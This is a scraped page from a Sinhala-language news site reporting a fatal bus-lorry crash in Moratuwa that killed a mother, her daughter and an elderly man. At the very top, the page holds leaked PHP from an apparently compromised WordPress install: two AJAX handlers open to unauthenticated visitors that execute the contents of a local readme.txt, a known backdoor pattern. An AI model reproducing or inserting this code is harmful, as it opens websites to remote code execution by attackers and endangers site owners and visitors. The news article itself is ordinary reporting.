if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } වසරකට පෙර මෑණියන් කහ ඉරි මතදී මියගිය තැනදීම දුව සමග බස් නැවතුමේදී මියගිය මොරටුවේ දීප්ති - mediahumanrights.lk
mediahumanrights.lk
Local News News

වසරකට පෙර මෑණියන් කහ ඉරි මතදී මියගිය තැනදීම දුව සමග බස් නැවතුමේදී මියගිය මොරටුවේ දීප්ති

මොරටුව, එගොඩඋයනේ නව ගාලු පාරේ බස් නැවතුමක් අසළදී පසුගිය සෙනසුරාදා(18) පස්වරුවේ සිදුවූ මාරක බස්-ලොරි අනතුරින් බරපතළ තුවාල ලැබූ තිදෙනකු මියගිය ආරංචිය රටම සසල කරා. එම මියගිය තිදෙනා අතරින් දෙදෙනෙකු වූයේ
එගොඩඋයන පදිංචි 47 හැවිරිදි මවක හා ඇගේ 13 හැවිරිදි දියණියයි.
දීප්ති මංජුලා නමැති මෙම මව මියගිය ස්ථානය අසළ පොල් ගෝනියක් ඇතුළු කළමනා බෑගයක්ද තිබුණි.ඇය ඒවා රැගෙන දුව සමග යළි නිවසට එමින් සිටියේ දානමය කටයුත්තකට අවශ්‍ය කළමනා රැස්කරන අතරේය. මෙම දානය දීප්තිගේ මව වෙනුවෙන් සූදානම් කළ එකක් වූ අතර දීප්තිගේ මව මියගොස් තිබුනේ මීට හරියටම වසරකට පෙර 2016 මාර්තු 20 වනදාය. පුදුමයට කාරණාව වන්නේ දීප්තිත් දියණියත් අනපේක්ෂිත ලෙස බස් ලොරි අනතුරට ලක්වූ බස් නැවතුම ආසන්නයේ තිබුණ කහ ඉරි මතදී ඇගේ මව මීට වසරකට පෙර බස් රථ අනතුරකින් මියගොස් තිබීමයි.
දීප්තිගේ මව සිටි ලෝකයට එම ස්ථානයේදීම ඇය දියණිය සමග වසරකට පසු ගමන් කිරීම දෛවෝපගතය. මියගිය දීප්තිගේ දියණිය පානදුර, වෑකඩ බෞද්ධාලෝක විදුහ‍ලේ අටවන වසරේ ඉගෙනුම ලැබූ තෙල්ගේ නෙත්මි දිලුක්ෂා පීරිස්ය.
දීප්තිගේ සැමියා ත්‍රීරෝද රථ රියදුරෙකු වන අතර ඔහු බිරිය හා දියණිය එදා නිවස අසළ බස් නැවතුමට එනතුරු බලා සිට ඇත්තේ පොල්ගෝනියද දමාගෙන දානයේ ඉතිරි වැඩ සූදානම් කරන්නටය. ඔවුන් ළමා නිවාසයකට මවගේ දානය දෙන්නට සැලසුම් සකස් කර තිබුණි.
අලුත්ගම සිට කොළඹ දෙසට වේගයෙන් ධාවනය වූ පුද්ගලික බස්රථය ඊට ඉදිරියෙන් ධාවනය වූ ලොරි රථයේ ගැටීමෙන් පසු ලොරිය අඩි 50ක් පමණ ඉදිරියට ගොස් මාර්ගය අයිනේ වූ බස් නැවතුම්‍පොළට කඩා වැදී මෙම අනතුර සිදුවූ අතර මව හා දියණිය බරපතල තුවාල ලැබූ අතරවාරයේ අසළ සිටි වයෝවෘද්ධ මහින්දසිරි පීරිස් නැමති 68 හැවිරිදි  පෙදරේරුවෙකුද තුවාල ලැබුවා.
ඔවුන් තිදෙනාම රෝහලේදී මියගියා. බස් රථය ලොරියේ ගැටුණු පසු ලොරි රථයේ රියැදුරු සිය රථය තිරිංග තදකර නතර කර ගැනීමට හෝ පැත්තකට කැපීමට කටයුතු කළේ නම් අනතුර වළක්වාගත හැකි ව තිබූ බව පොලිසිය පවසා තිබුණි. මෙම අනතුරින් පසු කෝපයට පත් ප්‍රදේශවාසීන් මොරටුව ‍පොලිසියට පැමිණ කලහකාරී ලෙස හැසිරුණු අතර තත්ත්වය පාලනය කිරීම සඳහා මොරටුමුල්ල සහ අඟුලාන යන ‍පොලිස් ස්ථානවලින්ද නිලධාරීන් කැඳවන ලදි.
මව හා දියණියගේ අකල් මරණය නිසා මේ වනවිට එගොඩ උයන ප්‍රදේශය කම්පනයට පත්ව ඇත.
(under the courtesy of gossiplanka news web)

Related posts

ත්‍රී රෝද ගාස්තුව ජූලි 10 සිට රු.10න් ඉහළට

Shiran Viraj

ෆාමසිවල ව්‍යාජ බෙහෙත්.. ඇතුලෙ තියෙන්නෙ පිටි විතරයි..

Shiran Viraj

ශ්‍රී ලංකා ක්‍රිකට් වෙනුවෙන් නව නීති අගමැති යෝජනා කරයි

Shiran Viraj